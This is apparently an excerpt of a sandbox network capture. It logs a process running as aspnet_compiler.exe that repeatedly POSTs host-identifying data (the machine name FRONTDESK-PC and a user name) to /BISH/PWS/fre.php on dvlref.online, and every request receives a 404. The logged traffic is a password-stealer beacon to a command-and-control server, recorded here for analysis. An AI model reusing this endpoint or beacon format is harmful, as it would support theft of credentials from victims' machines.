Dec 2, 2024 14:46:51.732389927 CET	803	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IehVdfUsnYpIgbAY4eZDdKetol9Z6xeE50kC1ERYV6%2BLuz0T8bcVh7QjRfTEX%2BD86520VatcGm8nON6HCyAXlYLrAf4%2FO2Sy%2Flx062xLiFwGEXP%2Bo%2FE82nmg4cQM9K%2Bt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc3f63bb642e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49771	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:52.042671919 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:52.163008928 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:53.403362989 CET	799	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UQ7r9%2Br%2F4Yt3vfk1yXsRlChkYA7xyHnkOHa43ZDf7mfryfv%2F1CnnEatujjMCNqvCY0Qf3xaIh4pn6hqRTtA%2Fxz0IM2WYd5%2F1d6dGYSHivH97lqAhfqSNh2gwRuaOM9GE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc401188442ef-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1540&min_rtt=1540&rtt_var=770&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49777	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:53.666260958 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:53.787714958 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:55.088901043 CET	798	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8L3K47K5oBma%2Fx5cQXKCK7dL%2F9MNGY3hAz7JigJjXIWswR1F%2F11ikVOdNfFFVOtmj9HRWOziKf7KSeIysXONjBlTwXW3nkXPuNtE86%2FE8kmSzEW6fNImMep4g4cEueER"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc40bbfab8c3f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2105&min_rtt=2105&rtt_var=1052&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49781	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:55.371119022 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:55.491152048 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:56.837189913 CET	800	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5WuD2aW%2BOX6xDb8tjkVwkOTxtLmfqdWTDlaX3QRCQjqUalFO%2FOvHLIPm1oF9XR6277TLBc%2FwEIf%2F4kzYM%2FbaOegzBi3j2wvWnnOqqgb3qMbwCkvUWVlby%2BbWkaZwUvKg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4163aa5f3bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1656&rtt_var=828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49785	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:57.098381042 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:57.218517065 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:58.470752954 CET	797	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UmO7WCcnKDrzFvqYoCdCx3LRFdtk2%2FGxBiPwsQZEMF%2FJcuNk5Os5lc7zrHASSbu5rYCEZVtpyvJyAVKsc9cdUhzBwjsipiXSJb8R4bk%2BwNpsST1B2ZR5f6%2FbTMTCB7nm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc420fb577cf9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1797&rtt_var=898&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49790	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:58.740385056 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:58.861315012 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:00.150437117 CET	806	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PC5TI%2FDOs%2FnXagzrQIRvE%2FHQckFKXQUVFsTT5z1i7EIzL8BRLLsMgvjXxX%2B%2FBu9YgtMRc9P07Ad5b6mT%2BwdU%2B3mw%2BEicpnQrLQFgSe5Wr6pgI489QWymYYc8IbG4vLKv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc42b7b1542f5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2657&min_rtt=2657&rtt_var=1328&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49796	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:00.411134958 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:00.531526089 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:01.846704960 CET	794	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uI6H1fFlx0W2Jp5W4ac3%2FK0vkhj%2BG6K310XdmWLfe6T5tDc6fobrWBKM2T3RiZISdhWaYbE6d8mMRIqOvGrqhFJFbRAIAHLDgA19rJlXqs8TDhdhwo7Ccx9Oxc73KttZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4356fea8c78-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2047&min_rtt=2047&rtt_var=1023&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49800	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:02.118983984 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:02.240374088 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:03.581765890 CET	791	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXgp45Bte48SJdhSGycJmGA07VouddRG5ZcwAr8VsHHWkb4vaPRow8f%2BKGM5xiRlSx5vUBCV8W5Qv5I7gNMVldta3gS1IhlwJtLAzNU6CfdZb1JjWzE3LLbG3EVqcsZW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4409cd54381-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1788&rtt_var=894&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49803	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:03.868850946 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:03.989197016 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:05.298873901 CET	801	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6K%2FiaS2gopocapwHCwUBDSG1MHazdhJe4IMAOIf%2BNhD093bN0RqaCxlnbkhCP5AUCPT%2FQiwu3754KTZQ9eZdZmgZRB4f3IDHx8tZ3lG7MVGcvJzk%2BZLvlFcBGXL6HonV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc44b7c248c6f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=48129&min_rtt=48129&rtt_var=24064&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49809	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:05.578545094 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:05.698801994 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:06.890754938 CET	793	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k1lDy7abSz1lcZu2NI3Q19vA3QjCmqQRvML0JaEknk6mjKvAnMf%2F0Bp8gysdzKUeFuGlMZqFAO9fHAzmi4f927k%2FmvPHKlyLQsdjmNePshGWzwXnH48sLqNbMIHr1GsN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc455a86aefa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1798&rtt_var=899&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49815	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:07.164653063 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:07.284781933 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:08.562284946 CET	795	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IDn8AqmjhFRKedibMK6Da5sg6meL%2BpNGm8kFm%2Fy8hQenW584IGiM1jU3fh3aWOUaP5sQ8zDRRU87tigYLEVPpxgNT3ahJV6Etw7VI2hrxuSzYfRo4NjM5rP%2BMEFyweli"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc45fc8a4c45e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1609&rtt_var=804&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49818	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:08.833358049 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:08.953660965 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:10.201376915 CET	812	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Po3FJo4H%2BamYCO1zPk%2Fceyz%2FTcBG4hhBUCR9HIf%2B48zGVWDm8ID4aosb23xk5hM4qZsN5ina%2BfNa%2Bwkfin4SjrP3wyVO1%2BZ1o4nmd8oHkj%2F5%2F%2BdiZl%2FdsxrLjIddGIQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc46a48858c59-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2021&rtt_var=1010&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49822	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:10.474898100 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:10.595338106 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:47:11.854860067 CET	793	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:47:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6aiWeyrF8%2B10SbTMO1Zk46WhOnEUbLfstHtp3wrUx%2ByuRl0GOXKNx1DIBaFQfDOnYY3CSTw8raT4WYqwdlOWWogweIMagRcLD9pTEAFtcRGf8omOSj8R0fOnadN4Xapr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc4748e4c0f46-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1631&rtt_var=815&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49828	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:47:12.119556904 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:47:12.239799976 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
